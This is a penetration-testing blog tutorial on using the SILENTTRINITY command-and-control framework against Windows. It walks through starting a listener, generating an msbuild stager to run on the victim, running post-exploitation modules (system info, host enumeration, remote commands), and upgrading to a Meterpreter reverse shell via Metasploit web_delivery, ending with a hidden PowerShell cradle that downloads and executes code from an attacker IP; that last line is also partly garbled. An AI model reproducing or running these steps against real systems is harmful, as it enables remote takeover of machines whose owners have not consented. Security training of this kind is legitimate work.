Hacking Articles|Raj Chandel's Blog: Command & Control: Silenttrinity Post-Exploitation Agent

In this article we will learn to use Silent Trinity tool to exploit windows.

Table of content:

· Introduction

· Installation

· Windows exploitation

· Windows post exploitation

· Silent trinity to meterpreter

Introduction

Silent trinity is a command and control tool dedicated to windows. It is developed by byt3bl33d3r in python, iron python, C# and .net. as it is windows dedicated tool, C# was but obvious choice as it has direct access .NET framework just like PowerShell. Its an amazing post exploitation tool for windows. This tool supports C2 server over HTTP 1.1.

Installation

Installing silent trinity is pretty easy as you just have to download it using git clone and then install its dependencies using pip command. To download silent trinity, use the following command :

git clone https://github.com/byt3bl33d3r/SILENTTRINITY

Now to install all the requirements using the following commands :

pip install -r requirements.txt

Once the installation is complete, start the said tool as shown in the image below :

Windows exploitation

As the tool is up and running, use ‘list’ command to see the list of listeners available. As you can see in the image below only listeners are available i.e. http, and https. To start the listener, use the following set of commands :

use http

start

When starting the listener, there is np need to give IP address or port as it automatically takes the IP of the local machine and the port is always pre-defined, depending on the listener, such as port 80 is specified for the listener http and port 443 is specified for the listener https. Now, as you can see that in the image below , with the help of the above commands our listener has started :

As we done with the listeners, now comes the stagers. Similar to listener, use the ‘list’ command to see the list of all the available listeners. Because this tool is a windows dedicated tool, there are only three stagers in relation to windows and they are msbuild, wmic, powershell. To launch the stager use the following set of commands :

use msbuild

generate http

Executing the above commands will create a file. Share that file to the target system using python server as shown in the image below :

And now, run the file in the command prompt of the target system with the following command :

C:\windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuiild.xml

As the file is executed, you can see in the image below, a session will be generated.

Windows Post Exploitation

As the session is generated, you can again use the ‘list’ command to see the list of post exploitation modules available, some of which we will show in our article, as shown in the image below :

Let’s try and use the message box. The purpose of this exploit is to pop a message on the victim’s PC. To use this exploit run the following set of commands :

use ipy/msgbox

set Text “Hacking Articles”

set Title “Hack”

run

And as the result of the said exploit, a message box will pop up on the target machine. You can see the message box in the image below :

The next exploit is to receive the basic information about the target system. And fot his, type the following set of commands :

use ipy/systeminfo

run

There is an module for enumeration of host and to run that module type the following set of commands :

use ipy/hostenum

run

As you can see you have catalogues and detailed information about your target system in the image below :

With the next exploit, you can access shell of the target system but command by command and for this type :

use ipy/shell

set Command ipconfig

run

As shown in the image below, it runs the ipconfig command through the session that have access to.

Silent trinity to meterpreter

To have a meterpreter session via silent trinity start Metasploit by using msfconsole command in a new terminal. And use the web_delivery exploit using the following command :

use exploit/multi/script/web_delivery

set payload windows/x64/meterpreter/reverse_tcp

set lhost eth0

set lport 4444

run

Running the above commands will generate a command that is to be run in the target system as shown in the image below :

The above generated command is to be run in the shell of the victim’s PC and for that execute the command in the shell by using silent trinity as we had run ipconfig command earlier. For this, type :

set Command “powershell.exe -nop -w hidden -c $W=new-object net.webclient;$W.proxy=[Net.WebRequest]::GetSystemWebProxy();$W.Proxy.CredentialCache]::DefaultCRedentialls;IEX $W.downloadstring(‘http://192.168.19.128:8080/lhMCcYixubz’);

eun